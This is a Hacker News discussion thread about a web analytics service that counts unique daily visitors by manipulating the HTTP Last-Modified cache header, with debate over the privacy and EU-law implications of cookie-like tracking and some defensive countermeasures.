| browsers still accept them. Can you add milliseconds to the TS,
| and do browsers store them too? Or do browsers also accept
| timestamps from months or years back and re-send them? If you
| can use the whole scale of Unix time (int32), there is a huge
| pool of entropy available.
|
| In this case they don't do this evil thing, and it probably
| would still violate the European GDPR, even if it's not an
| actual cookie, but somebody has to find it first.
| kapep wrote:
| Even without millisecond precision, you could embed multiple
| assets that are served with slightly different timestamps to
| encode a unique identifier.
| tedunangst wrote:
| Your personal visit count is embedded in the seconds.
| lisper wrote:
| Yes, but not your identity.
| michaelbuckbee wrote:
| They're using this to track number of unique visits from a
| single user to a site.
| Thorrez wrote:
| Yes, but I think they're not tracking anything else about the
| user besides number of visits. E.g. they're not tracking ip I
| don't think.
|
| And I think they are only doing it within a single day, not
| across days.
|
| If you know that someone exists who visited your site 500
| times today, but know nothing else about the person, is that
| a privacy problem?
| rkagerer wrote:
| ...at the cost of caching (or at least a round trip).
|
| Is it necessary to know how many visits per day a particular user
| made? If # of unique visitors per day/week/whatever is
| sufficiently granular you could retain a corresponding cache
| window.
|
| Also if this is to avoid those cookie warnings that got popular
| after GDPR, it should be noted you're still storing information
| on users' computers. i.e. The stuffed metadata is not so
| different in principle from a cookie. In this case it seems
| innocuous, but I wouldn't be surprised to see sites exploit your
| trick to store a unique last-modified date for each user as a
| method of tracking (if that's not already commonplace).
| not2b wrote:
| The number of unique visits in a day is the number of total
| visits minus the number of repeat visits from the same users,
| so they need something like this to get an accurate count. You
| can't produce the number without information on repeat
| visitors.
|
| I think you are right that this technique could be changed and
| turned into a way to track individual users. But as
| implemented, it doesn't do that, and all knowledge is lost
| after one day. We shouldn't criticize people who are trying to
| limit the information they collect to the bare minimum by
| pointing out an altered version of their system might have
| undesirable properties.
| rkagerer wrote:
| Then the server doesn't need to know about repeat-visits that
| don't hit it, and it would be nice to maintain caching
| support if the page content is static.
| irq-1 wrote:
| Change 'last-modified' to use a secure hash of the contents, like
| sha256. Then the browser can detect if a website is giving bad
| hashes, potentially using them for tracking.
| sdfhbdf wrote:
| Thats what ETag is for.
|
| https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ET...
| irq-1 wrote:
| ETags can be anything -- they aren't required to be a hash of
| the content.
|
| Thinking about this problem, why does the browser expose any
| information about what's in the cache? Client-side JavaScript
| can't tell what's in the cache because it's an obvious
| security issue. Why let the server know?
|
| Browsers should ask for the hashes on a list of content
| without exposing their cache contents. Then the browser can
| request anything thats changed.
| jefftk wrote:
| The way If-None-Match is that the browser says "give me the
| latest if this ETag represents an out-of-date resource,
| otherwise I'll keep using my copy." It's not clear to me
| how you're proposing this work instead?
|
| (Also, in many cases the server uses a hash of the inputs
| to generating the resource, which isn't something
| externally verifiable)
| jefftk wrote:
| ETag doesn't have any assurance that it's a hash of the page
| contents: the current protocol doesn't stop the server from
| embedding arbitrary information in the ETag, and there's no
| way for the client to tell.
| debugnik wrote:
| Neither does Last-Modified, as we just saw. If we were
| going to alter the meaning of a header for this, it should
| be ETag. Just agree on ETag formats that browsers can
| verify are just hashes, and have them throw away any opaque
| ETags or dates.
| jefftk wrote:
| You'd need to introduce something new for that. Many
| servers compute ETags today as hashes of _inputs_ to a
| process.
|
| (Which is nice computationally, since you can immediately
| say "not modified" instead of building the response,
| hashing it, and throwing it away if the hash matches)
| debugnik wrote:
| Well, I said "just hashes" for sort, but such ETag
| formats could agree on other algorithms as well, as long
| as the browser can verify them.
|
| And introducing a new method doesn't solve the issue of
| deprecating the existing abusable methods, which is why I
| suggested one that can already be implemented by privacy-
| first browsers one-sidedly. Servers would then be
| pressured to migrate to some friendly ETag format if they
| don't want to completely lose client-side caching for a
| (hopefully growing) share of their userbase.
| Isinlor wrote:
| This is really no different than a cookie - basically the same
| mechanism from the view of the server just different semantics.
| geocar wrote:
| Well, yes you could have a cookie with C=C+1 and carefully set
| the expiration to the end of the day (like the article), or you
| could use randomly generated last-modified times and
| deduplicate server-side (similar to how cookies are usually
| used), but I can think of a few reasons the cache would give
| greater precision, so even if a lot of the same things are the
| same, I'm not so sure it's really "no different"; these things
| are pretty important to (some) publishers:
|
| - third-party cookie blocking/notification features in browsers
|
| - review processes on ad networks checking for actual cookies
| rather than suspicious last-modified times
| legitster wrote:
| If anything, this is worse.
|
| Cookies have built in browser behavior - they have limited
| scope, the browser lets you see them, they get cleared out
| regularly.
|
| Abusing metadata is way sketchier.
| eurasiantiger wrote:
| Chances are they aren't the first to come up with something
| like this. How can we detect this kind of metadata abuse?
| fanso99 wrote:
| perhaps randomize minutes/seconds of the "last-modified"
| header.
| notpushkin wrote:
| Or perhaps just drop minutes/seconds. And maybe don't
| store the date altogether for files that are small
| enough?
| pornel wrote:
| Important to note that privacy laws that regulate tracking are
| not limited to the Cookie header. They apply to tracking and
| data collection in general, regardless of how technically
| clever you make it.
| ape4 wrote:
| Yes, cookies are a header field sent back by the browser and so
| is this.
| pavon wrote:
| Exactly. They could have the same functionality and privacy
| characteristics if they simply kept a cookie that incremented
| each time the site was visited. The fact that they didn't go
| this route suggests this is more about finding a way to track
| unique visitors when cookies are disabled. They are
| deliberately subverting the user's desire to not be tracked and
| spinning it as a privacy win.
| dahfizz wrote:
| If it was about tracking users, wouldn't they generate a
| unique timestamp per visitor on the first visit? Giving
| everyone the same timestamp is a terrible way to try and
| track individuals.
| dvko wrote:
| This is part of why I quit my privacy focused analytics start-
| up years ago. I won't name it directly, but it was one of the
| first and is still going strong (although not really open-
| source anymore).
|
| People kept asking for cookieless tracking but with another way
| of identifying returning visitors that was always worse from a
| privacy standpoint. Cookies can be controlled by the client,
| anything stored on the server can not.
|
| Honestly, cookies are pretty nice, it's the law around this
| that sucks. Tricks that attempt to bypass the laws will surely
| only work for a limited time, at least I hope they will...
| yunruse wrote:
| Hm, on Safari 16.1 it seems reloading twice clears the cache and
| therefore the counter (but eg cmd-W cmd-Z cmd-R will safely
| increase it). Either way, I think I would prefer this behaviour
| to be some sort of cookie that the law okays, because as everyone
| else has said, I'm quite browsers will fuzz these data.
|
| (I would probably go for a Gaussian fuzzer each visit, just
| because it adds the off chance that it's quite a way away from
| any attempted ID, making it a little bit more difficult to cast a
| wider net and get a few bits of entropy)
| mikem170 wrote:
| Their demo counter [0] didn't work in my browser, maybe because I
| normally have javascript disabled.
|
| In the demo it seems they have XMLHttpRequest code calling
| ping.withcabin.com/cache for this trick of theirs.
|
| Can this method of counting be made to work without javascript?
|
| [0] https://lastmodified.normally.com/
| zagrebian wrote:
| > Many privacy-focused analytics services will generate and store
| a UID on the server instead of saving it in a cookie - based on a
| hash of your User Agent, IP, Location, Date etc.
|
| What location? The Geolocation API?
|
| What date? How can a date contribute to a UID? Each visitor sends
| multiple HTTP requests at different dates.
| notpushkin wrote:
| If it's anonymous and doesn't collect any user data, why do we
| need it at all? Would using a cookie for the same purpose (just a
| counter of visits, resetting every day) trigger the GDPR laws
| somehow? It would work in literally same way except being
| transparent to the user instead of utilizing some shady
| technique.
| zzo38computer wrote:
| It should be able to detect that the date is not valid (and that
| their precision is wrong), and avoid sending a "If-Modified-
| Since" header. (The same would be true if they were assigned at
| random rather than sequential like this; it still should be able
| to detect that they are not valid and have wrong precision.)
| [deleted]
| birdmanjeremy wrote:
| The demo doesn't work in safari on my mac. It sometimes gets to
| 2, but on refresh goes back to 1. Actually, got it up to 4 one
| time. Seems like the claims of "Works in any browser and any
| server" are overstated.
| devmunchies wrote:
| same. I got it up to 8 by clicking into the address bar and
| hitting enter. However, doing a refresh instead caused it to
| reset (the browser didn't send the if-modified-since header so
| the server didn't do it's little trick and instead started
| over)
| alexmolas wrote:
| What if during a day I visit the website more than 86400 times?
| ;)
| speedgoose wrote:
| > This is great for privacy as we don't need to use cookies, IP
| addresses, fingerprinting or unique identifiers. In our tests,
| this method proved durable enough to be the most reliable method
| of counting unique visitors without using cookies.
|
| The differences with a cookie are that the header is named Last-
| modified instead of Set-Cookie and Cookie, and the value must be
| a datetime in the RFC2616 format.
|
| How is it good for privacy? I think it's worse because it's
| invisible for the user. I would bet tracking visitors using such
| an hack isn't compatible with GDPR, that requires an informed
| consent for tracking. And good luck explaining your hack to the
| average visitor.
| Etheryte wrote:
| You seem to slightly misunderstand how GDPR works. Tracking in
| and of itself is not the problem, it's personal data and
| personally identifying data that is. You can count how many
| hits your server receives no problem, this is roughly the same
| idea.
| havkom wrote:
| Basically the "cookie consent" part in the EU stems from the
| e-privacy directive. Article 5.3 refers to GDPR (through the
| directive that is replaced by GDPR) and reads:
|
| Member States shall ensure that the storing of information,
| or the gaining of access to information already stored, in
| the terminal equipment of a subscriber or user is only
| allowed on condition that the subscriber or user concerned
| has given his or her consent, having been provided with clear
| and comprehensive information, in accordance with Directive
| 95/46/EC, inter alia, about the purposes of the processing.
| This shall not prevent any technical storage or access for
| the sole purpose of carrying out the transmission of a
| communication over an electronic communications network, or
| as strictly necessary in order for the provider of an
| information society service explicitly requested by the
| subscriber or user to provide the service.
|
| In short, this method may fall under the EU "cookie law"
| above. The use of timestamps may require consent if they are
| used to distinguish users (even if only for counting
| purposes). The timestamps may then also be personal data
| under the GDPR.
| luckylion wrote:
| This is equivalent to setting a cookie with a hit count. It's
| still storing & submitting information, it's just not using a
| unique identifier (Which is pretty privacy-respecting, I'm
| not saying it's a terrible thing or something).
|
| I assume it will be treated as such, too. If you can use a
| cookie to do this without consent, this is fine too. If you
| can't then it's not. The same happens for local/session
| storage: it's cookie-equivalent.
| xyproto wrote:
| The user with the highest visit count will always be
| uniquely identifiable, though.
| not2b wrote:
| Only on the same day. Everything is reset the next day.
| jiveturkey wrote:
| I don't follow how this is a problem.
|
| By that measure, any users behind a unique single IP (no
| IP pooling, no CGNAT, etc) will always be uniquely
| identifiable. And for IP there's much fewer steps to
| personally identify the user. The server necessarily sees
| the user IP.
| speedgoose wrote:
| Yes, the IP can be used to identify people. If you want
| to track users using their IP and respect GDPR, you need
| to get their consent first.
|
| The best is to not store them before you get consent.
| Having a temporary access log with a few IPs is probably
| fine. But keeping all your access logs forever for
| analytics purposes is not fine anymore.
| speedgoose wrote:
| I will quote the law:
|
| > Natural persons may be associated with online identifiers
| provided by their devices, applications, tools and protocols,
| such as internet protocol addresses, cookie identifiers or
| other identifiers such as radio frequency identification
| tags. This may leave traces which, in particular when
| combined with unique identifiers and other information
| received by the servers, may be used to create profiles of
| the natural persons and identify them.
| jakobdabo wrote:
| ETag (paired with If-None-Match header sent by the browsers) is
| another caching header to be aware of.
|
| https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ET...
| doomrobo wrote:
| Ooh that's kinda evil. A server could give a client a uniquely
| identifying ETag for a given URL. So whenever the client comes
| back on the same browser, they're identified.
|
| Fortunately this is probably just as detectable as the Last-
| Modified abuse in the post.
| bawolff wrote:
| There are a lot of things like that. Although browsers
| changed it recently, you also used to be able to use TLS
| session tickets.
|
| Another one was the favicon cache.
|
| Pretty much any state on the browser can be used to track
| people.
| mulhoon wrote:
| Hi, author of the article here.
|
| Just to give a little more background here.
|
| Cabin doesn't store a row in a database for each visit. It only
| stores one row, per day per domain. The attributes for that row
| are simple tally counts - visits, uniques, bounces etc. So no
| identifier is stored, and the hits go into the tally. We do not
| store the fact that a user has visited x amount of times. The
| demo here is to show how the technique works.
|
| Cabin used to detect only the presence of _any_ last-modified
| date to determine if the visit is unique or not. But extending it
| to distinguish hits 1,2 and 3 (by adding 1 second to the start of
| the day) now allows us to count the bounce rates too.
| ohbtvz wrote:
| Have lawyers familiar with EU law vetted your technique? Could
| you share their legal reasoning? If not, why would anyone ever
| take the risk to use your product and face huge fines?
| senko wrote:
| (Not OP)
|
| I am all for privacy, use uBO, Firefox Focus / Incognito and
| Google alternatives. But if I have to consult a lawyer each
| time I write some code or write up a blog post, I'll take up
| gardening instead.
| jefftk wrote:
| The OP is a "privacy-first web analytics" company; this is
| totally something they should be asking their lawyers.
|
| Note that their list the GDPR on their "Privacy law
| compliance" page (https://docs.withcabin.com/privacy.html)
| but not ePrivacy...
| ohbtvz wrote:
| No need for this kind of hyperbole. I wouldn't ask this
| question if the OP's post didn't contain grandiose claims
| such as "No cookies, no consent banners, no ad networks,
| 100% GDPR & CCPA compliant, low footprint web analytics."
| OP made a claim about their compliance with EU law. I'm
| asking for proof or at least an explanation.
| rcoveson wrote:
| How about just consulting a lawyer each time you abuse a
| protocol to get user's software to behave in a way that is
| invisible to them and benefits you?
|
| There is already a correct way to tell a browser to tell
| the server something with each subsequent request: Cookies.
| Nobody needs to "write some code" here; it's already
| written. Working around the protocol isn't engineering,
| it's just lying.
|
| This blog post is just another cynical degredation of trust
| between users and their browsers, and browers and the
| servers they talk to. Just another part of HTTP that we
| can't use for what it was designed for anymore because
| servers want so desperately to track visitors uniquely and
| a significant subset of visitors would prefer not to be
| remembered uniquely.
| jefftk wrote:
| Your landing page says "no cookies or consent banners" and
| "compliant with all privacy laws", but the timestamp approach
| stores data on a user's computer in a way that is not "strictly
| necessary in order to provide an information society service
| explicitly requested by the subscriber or user". Could you
| explain how you see your approach as compliant with the
| ePrivacy directive?
|
| Full text: https://eur-lex.europa.eu/legal-
| content/EN/TXT/HTML/?uri=CEL...
|
| Guidance:
| https://ec.europa.eu/justice/article-29/documentation/opinio...
| IshKebab wrote:
| Yeah this is just a cookie by another name. Probably already
| used by supercookies.
|
| The GDPR doesn't single out cookies so you can't get around
| it by using a different storage device.
| jefftk wrote:
| _> The GDPR doesn 't single out cookies so you can't get
| around it by using a different storage device._
|
| Quibble: this isn't a GDPR issue, it's an ePrivacy issue.
| Two different regulations.
| lolinder wrote:
| Thanks for sharing!
|
| I personally don't have an issue with it, but one thing that
| might set some of the people here at ease is if you stopped
| incrementing the timestamp after the second visit.
|
| This would give you three possible states anyone could be in:
| never visited, visited once, and visited more than once. It's
| less data, but still enough to give you your bounce rate _and_
| your total visits while minimizing the number of boxes you 're
| sorting individual visitors into.
| josephscott wrote:
| This reminded me of something I haven't thought about in awhile:
| evercookie - https://github.com/samyk/evercookie
| [deleted]
| tobr wrote:
| That's pretty clever. I think if you really want to keep it
| privacy respecting, you should stop counting at 1 - so you can
| distinguish the first vs subsequent visits, but you can't tell if
| someone has visited 2 or 200 times.
| AkshatJ27 wrote:
| what is the problem with letting a website know how many times
| I have visited the page? How is it better for a website to only
| know if I have visited earlier or not?
| xyproto wrote:
| Many clients may have visited only one time, but when you
| reach higher numbers they may be used together with other
| data to help identify users.
|
| Maybe only one user will have over 100 visits, and then you
| can uniquely identify them.
| barefeg wrote:
| Makes sense. I'm not very experienced in privacy but could
| you explain why uniquely identifying the user is a problem?
| As in you can tell that there's one user who visited 100
| times but how can you use that information to correlate
| with an identity?
| _justinfunk wrote:
| This is also my question that all the people wearing
| their smart lawyer hats seem to be claiming but not
| explaining.
| WirelessGigabit wrote:
| Every subsequent visit they bump up the number.
| cortesoft wrote:
| I am having trouble understanding how knowing someone has
| visited three times is more privacy invasive than knowing they
| visited twice. What is so magical about 3?
| tobr wrote:
| Consider that there's some long tail of visitors who visit
| many times in one day. Someone is going to be visiting more
| times than anyone else, whether that's 10 or 100 or 1000 page
| views. That person is now uniquely trackable. To avoid that
| situation you need to stop counting somewhere, and you're not
| really getting any new info after 1 (well, 2 I suppose, if
| you want to track bounces), so you might as well stop there.
| dahfizz wrote:
| I don't agree that the existence of this header makes a
| user more trackable. You can already uniquely identify
| visitors with their IP & source port, which is included in
| every single packet and is way more specific than some
| timestamp.
|
| Your argument seems to be that this timestamp in the header
| could possibly be used as a lookup key in a database of
| visitors. I think that's a stretch, but in any case that
| database would be the privacy violating thing. This header
| is completely anonymous.
| tobr wrote:
| You're probably right! But since they aren't getting any
| more info by continuing to count after 2, it's just a
| liability to do it. After all, the whole point of the
| setup seems to be to minimize the amount of unique
| information the system has to process.
| o_m wrote:
| Counting to two is needed to handle the bounce rate.
| kube-system wrote:
| 3 is magical in that it comes after 2.
|
| If 100 people visited once, and one person visited twice...
| then a new request with visitCount=3 is that second person.
| Jabdoa2 wrote:
| I guess according to GDPR this counts as tracking nontheless.
| GDPR does not specifically mention cookies or anything technical.
| An identifier is enough (does not have to be a uuid). IP,
| location, browser etc already counts. This probably would count
| as storing something like a cookie on the client.
| WirelessGigabit wrote:
| I wonder how this works with systems like Akamai which by default
| mess with those headers.
| DueDilligence wrote:
| .. and we're fast on-track of a webkit extension to block this
| BS.
| cactacea wrote:
| Why block it entirely when you can just feed them garbage data?
| cpeterso wrote:
| Sending a garbage Last-Modified time might confuse the server
| and cause unpredictable problems for the user. Blocking it is
| safe because the server will just assume this is the first
| time the user has visited the website.
| enkrs wrote:
| Whats the motivation to block/misinform?
|
| This allows site owners get statistics on page
| views/uniques/bounces without unique identifier cookies or
| javascript injections.
|
| I'm all for blocking any abusive tracking methods, but this
| looks to me like creative website statistics that works for
| single domain. What's the harm by measuring that?
| michaelt wrote:
| While this _particular_ implementation doesn 't track
| individuals, couldn't your trivially start tracking
| individuals by sending them unique random times like _last-
| modified: 12 Mar 1978 12:34:56 GMT_ thereby giving them a
| ~30 bit unique identifier for as long as the file is
| cached?
| pwdisswordfish0 wrote:
| Only if you disregard the amount of latitude that the
| semantics of these headers give to UAs that would
| effectively thwart this method of tracking.
|
| If I fetch your /foo.html today in November 2022, and you
| send me a last-modified from 1978, that gives me and my
| UA a huge range from which to select a different datetime
| (anywhere between the 1978 value and now-ish) on my next
| request. How are you going to correlate my original and
| subsequent requests if in the latter I ask if you've got
| a copy that's been modified since 1999?
| marshray wrote:
| Sure, a UA _could_ do a whole lot of things to resist
| fingerprinting.
|
| But users go to the web with the browser they've been
| given.
|
| Apple, famously, forbids its users to speak HTTP with
| anything else on iOS.
| nkrisc wrote:
| > Whats the motivation to block/misinform?
|
| What's the motivation to submit to it?
| yojo wrote:
| Allowing websites to get a somewhat accurate count of
| visitors plus bounce rate helps them to tell how they're
| doing. Hopefully, they use that to guide developing a
| better product/service.
|
| If you can allow them to do that without getting tracked,
| it's win-win. You get a better experience when they build
| a better service.
| yojo wrote:
| To be clear, they're not generating _unique_ headers. They're
| setting them to the day start, so they can tell if the
| requester has already been to the site today or not. It
| actually seems pretty reasonable.
| pavon wrote:
| They way they are using it is providing less information than
| a UID cookie would, but the same amount of information as a
| boolean "previously visited" cookie. However, now that the
| technique is known there is nothing stopping people from
| using the same method to store a UID date, and privacy
| protecting clients will have difficulty differentiating
| between the two, so best to eliminate this as a
| fingerprinting method altogether.
| not2b wrote:
| People keep saying in this thread "there is nothing
| stopping people from using the same method" to do something
| else! I think that this is an irrelevant criticism. This is
| a valid attempt to minimize the amount of information
| collected on visitors and still providing a unique visitors
| per day count, and the fact that someone could build a
| similar but different system that looks like a cookie isn't
| relevant.
| pavon wrote:
| They demonstrated a PoC that uses an HTTP feature in a
| way it wasn't intended to add entropy to fingerprinting
| techniques. Discussing how this same exploit could be
| used maliciously by others and how to prevent that isn't
| criticism of the PoC, it is standard security practice.
| chipsa wrote:
| But you can't have as many bits in a UID date as for a
| generic cookie, and a privacy protecting client could just
| ignore the ones that don't make sense. Does a 1978 date
| make sense? Probably not. You could scale this up to the
| millions, probably, but it won't scale infinitely.
| genewitch wrote:
| roblox has ~50mm daily users (DAU), and if my math is
| correct (it probably isn't) you could have hour
| granularity (only 0-23) timestamps on 6 files, each day,
| and track 191mm unique users. I used roblox because i
| knew their DAU off-the-cuff - because roblox requires a
| login, they know who you are anyhow.
|
| But if you do 1 second granularity a mere 2 cache
| timestamps are enough to fingerprint everyone on the
| planet, each day.
|
| is my math wrong, here?
| rnhmjoj wrote:
| There probably is one already: this method is so old that the
| documentation of privoxy shows[1] how to defeat it. I can
| confirm it works: their example[2] website says I've visited
| 61996 times.
|
| [1]: https://www.privoxy.org/user-manual/actions-
| file.html#OVERWR...
|
| [2]: https://lastmodified.normally.com/
| jesprenj wrote:
| What's the reason for not storing a cookie? It's not like
| browsers that don't support cookies are targeted, right? Cookies
| can also be "great for privacy", if their power is not abused
| server-side ...
| jefftk wrote:
| I think this is probably illegal in EU countries. The ePrivacy
| Directive requires consent before storing data on a user's
| machine that isn't strictly necessary for providing the service
| the user requested. Analytics isn't "strictly necessary", and
| ePrivacy doesn't care whether you use the Cookie header or some
| other method of storage.
|
| I do think this is better for privacy than standard id-based
| approaches, but the law is very strict. More:
| https://www.jefftk.com/p/why-so-many-cookie-banners
|
| (Not a lawyer)
| yellow_lead wrote:
| Assuming you're correct, can anyone think of a way to count
| unique visitors without storing data on a users machine _or_
| using identifiable user information? Identifiable user
| information should include hashes that can be re-computed given
| the original information.
|
| This isn't a criticism of the law, I'm just curious what
| options there could be, because I can't think of any.
| genewitch wrote:
| Hi there, Marketing Company Intern!
|
| Tell them you'd rather make the coffee ;-)
| 411111111111111 wrote:
| Ha, that would explain that question. My first reaction was
| mostly confusion as there is so much prior art at this
| point, i.e. fingerprinting through installed add-ons,
| resolution/window size/system language, browser language,
| IP locality etc. There are even demo pages around which
| shows you just how unique your configuration is even
| without anything else.
|
| https://amiunique.org/fp
| yellow_lead wrote:
| Lol, I knew it would sound that way, but I don't work in
| this domain - just interested in privacy and this problem.
| genewitch wrote:
| the only reason we could think of for wanting unique
| visitors was for the marketing people or
| investors/stakeholders/shareholders. Parsing the request
| logs should be sufficient for every other metric.
|
| We had a bunch of meetings about this at what essentially
| amounted to a giant information superhighway billboard
| company. IIRC someone brought up using cache headers even
| back then, because it didn't require cookies or
| javascript, which we couldn't guarantee would be "up to
| date", this is back in "target IE6, still" days.
|
| As one of my networking friends said, advertisers usually
| know everything about your metrics, even if you don't.
| You can't really fudge the numbers in your favor, so raw
| requests or QPS or whatever ancillary metric would be
| enough.
|
| the method in the article is defeated by clearing your
| session when you're done browsing, or using
| incognito/private browsing tab, as that should mark all
| "cached" items for deletion.
| [deleted]
| Quarrelsome wrote:
| I thought GDPR cared mostly about uniquely identifying visitors
| which this does not do. You still need a cookie banner to state
| that you will put some data on their machine but you always
| need one of those.
| jefftk wrote:
| _> you always need one of those_
|
| The withcabin.com landing page claims you don't need consent
| banners to use it.
| t0mas88 wrote:
| That claim is false in Europe. You need to ask permission
| for this approach, because you're storing something on the
| user's device (the generated date in the cache) that isn't
| strictly necessarily. The ePrivacy directive says you need
| permission for that, nowhere does the law specify "cookies"
| it's about any kind of data stored on the user device.
| jefftk wrote:
| Uh, yes? That's exactly what I've been saying upthread.
| mgrund wrote:
| True it does not matter if it's a cookie, or whatever.
| You need to look to the ePrivacy directive article 5.3
| for which exemption case applies. In the case of
| timestamps, it would be case A :
|
| > when the cookie is used "for the sole purpose of
| carrying out the transmission of a communication over an
| electronic communications network" ("Exemption A")
|
| Since the timestamp is no longer used solely for this
| purpose, you need consent.
| bvinc wrote:
| What's to stop someone from sending unique last-modified dates to
| uniquely fingerprint browsers?
| nightpool wrote:
| Because the cache key for the site is partitioned by top-level
| origin in modern browsers, they wouldn't get any additional
| information this way that they couldn't get with existing
| first-party storage techniques, such as service worker caches,
| session cookies, IndexedDB, etc. See e.g.
| https://developer.mozilla.org/en-US/docs/Web/Privacy/State_P...
| for example. Opening a new incognito window would trivially
| defeat this method of "tracking". This is basically just a very
| small first-party-only cookie.
| SahAssar wrote:
| Then why not use a cookie? The laws regarding tracking are
| not actually about cookies, but about all cookie-like
| tracking. What does this method gain?
| nightpool wrote:
| The ability to put "no cookies :)" in your marketing
| materials
| [deleted]
| 1vuio0pswjnm7 wrote:
| What happens if the user disables Javascript.
|
| The page lastmodified.normally.com claims "Works in any browser
| or any server". What if the browser has no Javascript engine.
|
| In this case I tried the demo with a browser that has a JS
| engine, with JS enabled, and the demo still did not work. That is
| because "ping.withcabin.com" was not disclosed to the user. The
| OP suggests that users access "lastmodified.normally.com". It
| says nothing about accessing "ping.withcabin.com". As such, the
| proxy does not contain any address info for that domain. The user
| (me) never typed it.
|
| Instead of a browser, I use a localhost-bound forward proxy to
| control requests and responses, including HTTP headers. The proxy
| contains all of the domain-to-IP address mappings I need in
| memory. Why should I add an IP address for "ping.withcabin.com".
| The request returns no content.
|
| 1. For example, something like acl cabin
| hdr(host) -m str ping.withcabin.com http-request del-
| header If-Modified-Since if cabin http-response del-
| header Cache-Control if cabin http-response del-header
| Last-Modified if cabin
| bennyp101 wrote:
| Seems a fairly benign way of counting how many people are
| visiting your site.
|
| Not like its tracking you across domains and services, more a
| counter for how many people have visited, and either stayed and
| looked around, or left.
| meowface wrote:
| >Not like its tracking you across domains and services
|
| The same can be said of first-party cookies.
___________________________________________________________________
(page generated 2022-11-30 23:00 UTC)